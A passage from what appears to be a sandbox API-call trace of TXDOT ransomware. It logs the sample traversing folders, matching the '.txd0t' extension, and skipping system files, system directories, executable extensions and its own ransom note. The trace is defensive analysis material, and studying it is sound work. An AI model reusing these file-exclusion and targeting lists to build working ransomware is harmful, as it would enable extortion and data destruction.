ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0114.160] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0114.160] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0114.160] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0114.160] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0114.160] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt" [0114.160] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0114.160] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0114.160] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0114.160] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5810ed51, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf5b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0114.160] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0114.160] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0114.160] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0114.160] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0114.160] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t" [0114.160] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0114.160] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.160] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x143aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0114.160] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0114.161] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0114.161] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0114.161] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0114.161] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t" [0114.161] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0114.161] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0114.161] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0114.161] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0114.161] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0114.161] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1031", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031") returned="C:\\588bce7c90097ed212\\1031" [0114.161] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\") returned="C:\\588bce7c90097ed212\\1031\\" [0114.161] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1031\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" [0114.161] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.161] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0114.161] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0114.161] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0114.161] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0114.161] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0114.161] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0114.161] GetProcessHeap () returned 0xe30000 [0114.161] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0114.161] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1032", cAlternateFileName="")) returned 1 [0114.162] StrCmpW (psz1="1032", psz2=".") returned 1 [0114.162] StrCmpW (psz1="1032", psz2="..") returned 1 [0114.162] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0114.162] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0114.162] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1032", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system32\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\syswow64\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\system\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\windows\\winsxs\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\roaming\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\local\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\locallow\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\all users\\microsoft\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\inetpub\\logs\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\boot\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\perflogs\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\programdata\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\drivers\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\wsus\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\efstmpwp\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\$recycle.bin\\") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="crypt_detect") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="cryptolocker") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="ransomware") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\WINDOWS") returned 0x0 [0114.162] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files (x86)") returned 0x0 [0115.489] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files") returned 0x0 [0115.493] GetProcessHeap () returned 0xe30000 [0115.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0115.494] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0115.494] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\*") returned="C:\\588bce7c90097ed212\\1032\\*" [0115.497] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0115.498] StrCmpW (psz1=".", psz2=".") returned 0 [0115.498] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.498] StrCmpW (psz1="..", psz2=".") returned 1 [0115.498] StrCmpW (psz1="..", psz2="..") returned 0 [0115.510] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5818147a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5818147a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5818147a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0115.510] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0115.510] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0115.510] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0115.530] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0115.530] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt" [0115.530] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0115.530] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0115.534] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0115.546] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0115.546] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x24ac, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0115.546] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0115.550] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0115.550] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0115.550] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0115.551] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t" [0115.554] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0115.555] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.555] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1530c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0115.555] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0115.559] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0115.559] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0115.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0115.559] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t" [0115.571] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0115.571] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.571] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0115.571] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0115.575] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0115.575] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0115.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0115.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" [0115.576] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.576] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0115.576] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0115.580] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0115.580] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0115.580] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.580] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0115.580] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0115.584] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0115.596] GetProcessHeap () returned 0xe30000 [0115.596] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0115.596] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58324e32, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0115.596] StrCmpW (psz1="1033", psz2=".") returned 1 [0115.601] StrCmpW (psz1="1033", psz2="..") returned 1 [0115.601] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0115.601] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0115.601] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1033", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0115.601] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system32\\") returned 0x0 [0115.605] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\syswow64\\") returned 0x0 [0115.605] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system\\") returned 0x0 [0115.605] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\winsxs\\") returned 0x0 [0115.605] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\roaming\\") returned 0x0 [0115.605] StrStrIW 